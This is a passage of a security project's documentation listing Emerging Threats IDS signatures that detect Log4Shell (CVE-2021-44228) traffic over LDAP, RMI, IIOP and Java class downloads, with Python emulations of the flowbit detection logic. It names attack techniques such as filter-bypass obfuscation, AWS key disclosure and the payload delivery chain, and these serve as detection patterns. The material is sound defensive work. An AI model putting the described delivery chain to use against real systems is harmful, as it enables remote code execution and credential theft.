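Signature content matches run against the raw bytes on the wire, so this normalization is what a log-side or SIEM check can add on top of the IDS alerts, not a replacement for them.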
## AWS Key Disclosure

| Inbound SID | Outbound SID | msg |
|-------------|--------------|---|
| 2034699 | 2034807 | ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (CVE-2021-44228) |

### Nested lower/upper

| Inbound SID | Outbound SID | msg |
|-------------|--------------|---|
| 2034706 | 2034798 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (CVE-2021-44228) |
| 2034707 | 2034797 | ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (CVE-2021-44228) |
| 2034708 | 2034796 | ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (CVE-2021-44228) |
| 2034709 | 2034795 | ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (CVE-2021-44228) |

## Bypass "Hunting" Rules

| Inbound SID | Outbound SID | msg |
|-------------|--------------|---|
| 2034661 | 2034783 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol TCP (CVE-2021-44228) |
| 2034662 | 2034784 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol UDP (CVE-2021-44228) |
| 2034663 | 2034785 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228) |
| 2034664 | 2034801 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228) |
| 2034665 | 2034802 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228) |
| 2034666 | 2034803 | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228) |
| 2034808 | | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228) |
| 2034809 | | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228) |
| 2034810 | | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper TCP Bypass) (CVE-2021-44228) |
| 2034811 | | ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (upper UDP Bypass) (CVE-2021-44228) |

--------------------------------------------------------------------------------
/detection_details/IIOP/README.md:
--------------------------------------------------------------------------------
# Log4Shell IIOP Traffic
Log4Shell attack strings which include `iiop://` can result in Internet Inter-ORB Protocol (IIOP) connection requests.
The signatures detailed below attempt to detect this IIOP traffic.

A pcap of non-malicious IIOP traffic can be found on [Cloudshark](https://www.cloudshark.org/captures/d706cd5c3906?filter=giop)

Details of the protocol can be found via [Oracle documentation](https://docs.oracle.com/cd/E13211_01/wle/wle42/corba/giop.pdf)

# Example Traffic
![](images/iiop_request.png)

# Detection Logic
Network detection for IIOP, which is largely GIOP (General Inter-ORB Protocol) over TCP/IP, focuses on alerting on an
outbound request followed by a valid GIOP message from the server.
## Outbound Request

| sid | msg | Notes | Detection Screenshot |
|---------|--------------------------------------|--------------|-------------------------------|
| 2034730 | ET POLICY GIOP/IIOP Request Outbound | sets flowbit | [2034730](images/2034730.png) |

## Successful Response

| sid | msg | Notes | Detection Screenshot |
|---------|-------------------------------------------------|----------------------|-------------------------------|
| 2034731 | ET POLICY Successful GIOP/IIOP Request Outbound | depends on `2034730` | [2034731](images/2034731.png) |

--------------------------------------------------------------------------------
/detection_details/Java_Class_Download/README.md:
--------------------------------------------------------------------------------
# Log4Shell Java Class Payload Downloads
During the RCE path for
Log4Shell attempts, it is common to see the vulnerable application request a Java payload from
a webserver. The signatures detailed below attempt to detect this behavior.

# Example Traffic
![](images/download.png)

# Detection Logic
In order to detect outbound requests for a Java class, a flowbit is used to first identify an outbound HTTP request
from Java, followed by a class file or a serialized object being returned. It is important to note that this does not by
itself indicate malicious traffic; however, given this behavior in the Log4Shell RCE path, alerts from these signatures,
with particular attention paid to the [Class Download Rules](#class-response-rules), warrant investigation.

## Java Client HTTP Requests
These signatures are designed to set a flowbit on an HTTP request by a Java application, as determined by the User-Agent
of the request.

| sid | msg | Example UA | Flowbit Set | Alerting |
|---------|---------------------------------------------------|-------------------|-------------------------------|----------|
| 2013035 | ET POLICY Java Client HTTP Request | `Java/` | ET.http.javaclient | False |
| 2011581 | ET POLICY Vulnerable Java Version 1.5.x Detected | `Java/1.5.0` | ET.http.javaclient.vulnerable | True |
| 2011582 | ET POLICY Vulnerable Java Version 1.6.x Detected | `Java/1.6.0_210` | ET.http.javaclient.vulnerable | True |
| 2011584 | ET POLICY Vulnerable Java Version 1.4.x Detected | `Java/1.4.0` | ET.http.javaclient.vulnerable | True |
| 2014297 | ET POLICY Vulnerable Java Version 1.7.x Detected | `Java/1.7.0_300.` | ET.http.javaclient.vulnerable | True |
| 2019401 | ET POLICY Vulnerable Java Version 1.8.x Detected | `Java/1.8.0_290` | ET.http.javaclient.vulnerable | True |
| 2025314 | ET POLICY Vulnerable Java Version 9.0.x Detected | `Java/9.0` | ET.http.javaclient.vulnerable | True |
| 2025518 | ET POLICY Vulnerable Java Version 10.0.x Detected | `Java/10.0.0` | ET.http.javaclient.vulnerable | True |
| 2028867 | ET POLICY Vulnerable Java Version 11.0.x Detected | `Java/11.0.12` | ET.http.javaclient.vulnerable | True |
| 2028868 | ET POLICY Vulnerable Java Version 12.0.x Detected | `Java/12.0.1` | ET.http.javaclient.vulnerable | True |
| 2028869 | ET POLICY Vulnerable Java Version 13.0.x Detected | `Java/13.0.1` | ET.http.javaclient.vulnerable | True |
| 2034814 | ET POLICY Vulnerable Java Version 14.0.x Detected | `Java/14.0.1` | ET.http.javaclient.vulnerable | True |
| 2034815 | ET POLICY Vulnerable Java Version 15.0.x Detected | `Java/15.0.1` | ET.http.javaclient.vulnerable | True |
| 2034816 | ET POLICY Vulnerable Java Version 16.0.x Detected | `Java/16.0.1` | ET.http.javaclient.vulnerable | True |
| 2034817 | ET POLICY Vulnerable Java Version 17.0.x Detected | `Java/17.0.0` | ET.http.javaclient.vulnerable | True |

## Class Response Rules
The following rules alert on the response and require either `ET.http.javaclient.vulnerable` or `ET.http.javaclient`
to have been set by the outgoing request.

| sid | msg | Flowbit Required | Detection Screenshot |
|---------|---------------------------------------------------------|-------------------------------|-------------------------------|
| 2014474 | ET INFO JAVA - Java Class Download | ET.http.javaclient | [2014474](images/2014474.png) |
| 2014475 | ET INFO JAVA - Java Class Download By Vulnerable Client | ET.http.javaclient.vulnerable | [2014475](images/2014475.png) |
| 2016502 | ET INFO Java Serialized Data via vulnerable client | ET.http.javaclient.vulnerable | |
| 2016503 | ET INFO Java Serialized Data | ET.http.javaclient | |
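The flowbit sequence described in this README, emulated in Python as an added example that is not the project's own code: stage one classifies the Java User-Agent and sets the flowbits from the table above, stage two alerts on the response only when the matching flowbit is set. Keying the vulnerable-version match on the major.minor prefix alone, and detecting the response by the class-file (0xCAFEBABE) or serialization-stream (0xACED0005) magic bytes, are simplifications assumed here; the real rules' exact match content is not on this page.

```python
import re

# Major.minor User-Agent prefix -> sid of the "Vulnerable Java Version x.y.x Detected" rule,
# from the table above. Matching on the prefix alone is a simplification made for this example.
VULNERABLE_JAVA_SIDS = {
    "1.4": 2011584, "1.5": 2011581, "1.6": 2011582, "1.7": 2014297, "1.8": 2019401,
    "9.0": 2025314, "10.0": 2025518, "11.0": 2028867, "12.0": 2028868, "13.0": 2028869,
    "14.0": 2034814, "15.0": 2034815, "16.0": 2034816, "17.0": 2034817,
}
JAVA_UA = re.compile(r"^Java/(\d+\.\d+)")
CLASS_MAGIC = b"\xca\xfe\xba\xbe"        # first four bytes of a Java .class file
SERIALIZED_MAGIC = b"\xac\xed\x00\x05"   # Java serialization STREAM_MAGIC + STREAM_VERSION


def inspect_request(headers: dict):
    """Stage 1, the outbound HTTP request: returns (flowbits, alerts) following the
    'Flowbit Set' and 'Alerting' columns of the table above."""
    flowbits, alerts = set(), []
    ua = headers.get("User-Agent", "")
    if not ua.startswith("Java/"):
        return flowbits, alerts
    flowbits.add("ET.http.javaclient")          # sid 2013035 sets the flowbit but does not alert
    m = JAVA_UA.match(ua)
    if m and m.group(1) in VULNERABLE_JAVA_SIDS:
        flowbits.add("ET.http.javaclient.vulnerable")
        alerts.append((VULNERABLE_JAVA_SIDS[m.group(1)],
                       f"ET POLICY Vulnerable Java Version {m.group(1)}.x Detected"))
    return flowbits, alerts


def inspect_response(flowbits: set, body: bytes):
    """Stage 2, the response on the same flow: alerts only when the required flowbit was
    set by stage 1 and the body is a class file or a Java serialization stream."""
    alerts = []
    if body.startswith(CLASS_MAGIC):
        if "ET.http.javaclient.vulnerable" in flowbits:
            alerts.append((2014475, "ET INFO JAVA - Java Class Download By Vulnerable Client"))
        if "ET.http.javaclient" in flowbits:
            alerts.append((2014474, "ET INFO JAVA - Java Class Download"))
    elif body.startswith(SERIALIZED_MAGIC):
        if "ET.http.javaclient.vulnerable" in flowbits:
            alerts.append((2016502, "ET INFO Java Serialized Data via vulnerable client"))
        if "ET.http.javaclient" in flowbits:
            alerts.append((2016503, "ET INFO Java Serialized Data"))
    return alerts


def inspect_transaction(headers: dict, body: bytes):
    """Run both stages over one request/response pair; returns all (sid, msg) alerts."""
    flowbits, alerts = inspect_request(headers)
    return alerts + inspect_response(flowbits, body)


# Constructed sample transaction (not a capture): a Java 1.8 client fetching a class file.
# The body is only the class-file magic plus version/padding bytes, not a real class.
SAMPLE_HEADERS = {"User-Agent": "Java/1.8.0_290", "Host": "payload.example"}
SAMPLE_CLASS_BODY = CLASS_MAGIC + b"\x00\x00\x00\x34" + b"\x00" * 16

if __name__ == "__main__":
    for sid, msg in inspect_transaction(SAMPLE_HEADERS, SAMPLE_CLASS_BODY):
        print(sid, msg)
```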
--------------------------------------------------------------------------------
/detection_details/LDAP/README.md:
--------------------------------------------------------------------------------
# Log4Shell LDAP Traffic
Log4Shell attack strings which include `ldap://` can result in LDAP queries to "malicious LDAP" servers for Java
objects. The signatures detailed below attempt to detect this LDAP traffic. Most often, the LDAP response is not the
actual payload, but results in an actual [Java Class Payload](../Java_Class_Download/README.md) being downloaded from a
webserver.

# Example Traffic
Anonymous LDAPv3 Request with Java Class Response

![](images/anon_ldap_with_payload.png)

# Detection Logic
Multiple signatures have been created in order to detect the different stages of pulling down the Java payload via LDAP.
## Outbound Request

| sid | msg | Detection Screenshot |
|---------|------------------------------------------------------|------------------------------------------------------|
| 2034704 | ET POLICY Anonymous LDAPv3 Bind Request Outbound | [2034704](images/anon_ldap_with_payload_request.png) |
| 2034812 | ET POLICY Non-Anonymous LDAPv3 Bind Request Outbound | [2034812](images/non-anon_ldap_request.png) |

## Successful Response

| sid | msg | Detection Screenshot |
|---------|-----------------------------------------------------------------|-------------------------------------------------------|
| 2034705 | ET POLICY Successful Anonymous LDAPv3 Bind Request Outbound | [2034705](images/anon_ldap_with_payload_response.png) |
| 2034771 | ET POLICY Successful Non-Anonymous LDAPv3 Bind Request Outbound | [2034771](images/non-anon_ldap_response.png) |

## Payload Delivery
### Attack Response

These signatures were created based on observed malicious samples.

| sid | msg | Detection Screenshot |
|---------|---------------------------------------------------------------------------|----------------------------------------------------------------|
| 2034722 | ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response | [2034722](images/anon_ldap_with_payload_response_payload.png) |
| 2034769 | ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via LDAPv3 Response M2 | [2034769](images/anon_ldap_with_payload_response_payload2.png) |

### Policy
These signatures are designed to broadly detect Java objects being returned from LDAP and have been created in an effort
to reduce false negatives.

| sid | msg | Note | Detection Screenshot |
|---------|-----------------------------------------------------------------------------|----------------------|--------------------------------------------|
| 2034770 | ET POLICY JavaClass Returned Via Anonymous Outbound LDAPv3 Bind Request | depends on `2034704` | [2034770](images/ldap_javaClass.png) |
| 2034772 | ET POLICY JavaClass Returned Via Non-Anonymous Outbound LDAPv3 Bind Request | depends on `2034812` | [2034772](images/ldap_javaClass.png) |
| 2034818 | ET POLICY Serialized Java Object returned via LDAPv3 Response | | [2034818](images/ldap_serialized_java.png) |
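The three LDAP stages above (bind request, bind response, Java object in the returned entry) in Python, as an added example that is not the project's code: a minimal BER decoder classifies a BindRequest as anonymous or non-anonymous, checks a BindResponse for success, and looks in a SearchResultEntry for the RFC 2713 Java attributes that a JNDI lookup reads (javaClassName, javaCodeBase, javaSerializedData, javaFactory) or a value starting with the Java serialization magic. That the ET rules key on the same attribute names is an assumption; the sample messages are hand-built with the tlv() helper, not taken from a capture.

```python
# Minimal BER decoding for the LDAPv3 stages above; JAVA_ATTRIBUTES is the RFC 2713 schema a JNDI lookup reads.
BIND_REQUEST, BIND_RESPONSE, SEARCH_RESULT_ENTRY = 0x60, 0x61, 0x64   # LDAP [APPLICATION n] tags
JAVA_ATTRIBUTES = {b"javaClassName", b"javaCodeBase", b"javaSerializedData", b"javaFactory"}
SERIALIZED_MAGIC = b"\xac\xed\x00\x05"   # Java serialization STREAM_MAGIC + STREAM_VERSION

def ber_decode(buf, pos=0):
    """Decode one BER TLV at buf[pos]; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low 7 bits = count of length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def ber_children(value):
    """Decode every TLV directly inside a constructed value, as (tag, value) pairs."""
    items, pos = [], 0
    while pos < len(value):
        tag, v, pos = ber_decode(value, pos)
        items.append((tag, v))
    return items

def protocol_op(message):
    """LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp CHOICE }; return the op TLV or None."""
    tag, body, _ = ber_decode(message)
    parts = ber_children(body) if tag == 0x30 else []
    return parts[1] if len(parts) >= 2 and parts[0][0] == 0x02 else None

def classify_bind_request(message):
    """'anonymous' (sid 2034704: empty DN and empty simple credentials), 'non-anonymous' (sid 2034812), or None."""
    op = protocol_op(message)
    if not op or op[0] != BIND_REQUEST:
        return None
    version, name, auth = ber_children(op[1])[:3]
    if version[1] != b"\x03":                # only LDAPv3 binds are in scope
        return None
    return "anonymous" if name[1] == b"" and auth == (0x80, b"") else "non-anonymous"

def bind_succeeded(message):                 # BindResponse with resultCode success (0): sids 2034705/2034771
    op = protocol_op(message)
    return bool(op) and op[0] == BIND_RESPONSE and ber_children(op[1])[0][1] == b"\x00"

def java_payload_indicators(message):
    """RFC 2713 Java attributes in a SearchResultEntry, plus 'serialized' for a serialized value (sids 2034770/2034818)."""
    op, found = protocol_op(message), set()
    if not op or op[0] != SEARCH_RESULT_ENTRY:
        return found
    for _, attr in ber_children(ber_children(op[1])[1][1]):   # attributes: PartialAttributeList
        (_, atype), (_, values) = ber_children(attr)[:2]
        if atype in JAVA_ATTRIBUTES:
            found.add(atype.decode())
        if any(v.startswith(SERIALIZED_MAGIC) for _, v in ber_children(values)):
            found.add("serialized")
    return found

def tlv(tag, value):                         # short-form BER TLV encoder (values < 128 bytes) for the samples
    return bytes([tag, len(value)]) + value

# Constructed sample messages (hand-built, not from a capture): anonymous bind, success, entry with Java attributes.
ANON_BIND = tlv(0x30, tlv(0x02, b"\x01") + tlv(BIND_REQUEST, tlv(0x02, b"\x03") + tlv(0x04, b"") + tlv(0x80, b"")))
BIND_OK = tlv(0x30, tlv(0x02, b"\x01") + tlv(BIND_RESPONSE, tlv(0x0a, b"\x00") + tlv(0x04, b"") + tlv(0x04, b"")))
ENTRY = tlv(0x30, tlv(0x02, b"\x02") + tlv(SEARCH_RESULT_ENTRY, tlv(0x04, b"cn=x,dc=example") + tlv(0x30,
    tlv(0x30, tlv(0x04, b"javaClassName") + tlv(0x31, tlv(0x04, b"Foo")))
    + tlv(0x30, tlv(0x04, b"javaSerializedData") + tlv(0x31, tlv(0x04, SERIALIZED_MAGIC + b"\x73"))))))
```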
--------------------------------------------------------------------------------
/detection_details/RMI/README.md:
--------------------------------------------------------------------------------
# Log4Shell RMI Traffic
Log4Shell attack strings which include `rmi://` can result in a Remote Method Invocation (RMI) connection to
"malicious RMI" servers for Java objects. The signatures detailed below attempt to detect this RMI traffic.

The wire protocol for RMI is described within the [Oracle Documentation](https://docs.oracle.com/javase/9/docs/specs/rmi/protocol.html)

# Example Traffic
![](images/traffic_example.png)

# Detection Logic
Network detection for RMI focuses on alerting on an outbound request followed by a Java payload being returned by the
RMI server.

## Outbound Request

| sid | msg | Notes | Detection Screenshot |
|---------|--------------------------------|--------------|----------------------------------------|
| 2034718 | ET POLICY RMI Request Outbound | sets flowbit | [2034718](images/outbound_request.png) |

## Successful Response
A successful response is a packet starting with `\x4e`. Due to the short and dynamic nature of the server reply, a
signature was not created for a Successful Response.

## Payload Delivery
The objective of using RMI is to deliver a Java payload which will be run by the application. There are two signatures
which will alert on Java payloads returned via an RMI connection.
## Serialized and Unserialized Java Payload

| sid | msg | Notes | Detection Screenshot |
|---------|------------------------------------------------------|----------------------|-------------------------------|
| 2034748 | ET POLICY Serialized Java Payload via RMI Response | depends on `2034718` | [2034748](images/2034748.png) |
| 2034749 | ET POLICY Unserialized Java Payload via RMI Response | depends on `2034718` | |
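The RMI outbound-request flowbit followed by a serialized payload in the server's reply, emulated in Python as an added example (not the project's code): a parser for the JRMI transport header, a check for the ProtocolAck (`\x4e`) reply, and a flow evaluator for sids 2034718 and 2034748. The flowbit name and the sample exchange are constructed for this example, and the unserialized payload rule (2034749) is not modelled because the page does not say what it matches on.

```python
import struct

JRMI_MAGIC = b"JRMI"                     # 0x4a524d49, start of every RMI transport header
JRMI_VERSION = 2
PROTOCOLS = {0x4b: "StreamProtocol", 0x4c: "SingleOpProtocol", 0x4d: "MultiplexProtocol"}
PROTOCOL_ACK, PROTOCOL_NOT_SUPPORTED = 0x4e, 0x4f
RETURN_DATA = 0x51                       # server-side "ReturnData" message of the wire protocol
SERIALIZED_MAGIC = b"\xac\xed\x00\x05"   # Java serialization STREAM_MAGIC + STREAM_VERSION
FLOWBIT = "ET.rmi.request.outbound"      # name chosen for this example, not the rule's own


def parse_rmi_header(data: bytes):
    """Decode the 7-byte client header: magic 'JRMI', 2-byte version, 1-byte protocol.
    Returns {'version': .., 'protocol': ..} or None when it is not an RMI handshake."""
    if len(data) < 7 or data[:4] != JRMI_MAGIC:
        return None
    version = struct.unpack(">H", data[4:6])[0]
    if version != JRMI_VERSION or data[6] not in PROTOCOLS:
        return None
    return {"version": version, "protocol": PROTOCOLS[data[6]]}


def is_protocol_ack(server_bytes: bytes) -> bool:
    """A successful handshake reply starts with ProtocolAck (0x4e); the README above explains
    why no signature exists for it (the rest, hostname and port, is short and dynamic)."""
    return len(server_bytes) > 0 and server_bytes[0] == PROTOCOL_ACK


def evaluate_rmi_flow(client_to_server: bytes, server_messages: list):
    """Emulate sids 2034718 and 2034748: the outbound JRMI header sets a flowbit; a later
    server message carrying a Java serialization stream alerts only if that flowbit is set."""
    alerts, flowbits = [], set()
    if parse_rmi_header(client_to_server):
        flowbits.add(FLOWBIT)
        alerts.append((2034718, "ET POLICY RMI Request Outbound"))
    for msg in server_messages:
        if FLOWBIT in flowbits and SERIALIZED_MAGIC in msg:
            alerts.append((2034748, "ET POLICY Serialized Java Payload via RMI Response"))
            break                                    # one alert per flow is enough
    return alerts


# Constructed sample exchange (not a real capture): StreamProtocol handshake, ProtocolAck with
# the server's endpoint (UTF hostname + int port), then a ReturnData message whose body is a
# serialization stream (the bytes after the magic are placeholder block data).
CLIENT_HELLO = JRMI_MAGIC + struct.pack(">H", JRMI_VERSION) + b"\x4b"
SERVER_ACK = bytes([PROTOCOL_ACK]) + struct.pack(">H", 9) + b"127.0.0.1" + struct.pack(">I", 1099)
SERVER_RETURN = bytes([RETURN_DATA]) + SERIALIZED_MAGIC + b"\x77\x01\x01"

if __name__ == "__main__":
    print(parse_rmi_header(CLIENT_HELLO))
    print(is_protocol_ack(SERVER_ACK))
    print(evaluate_rmi_flow(CLIENT_HELLO, [SERVER_ACK, SERVER_RETURN]))
```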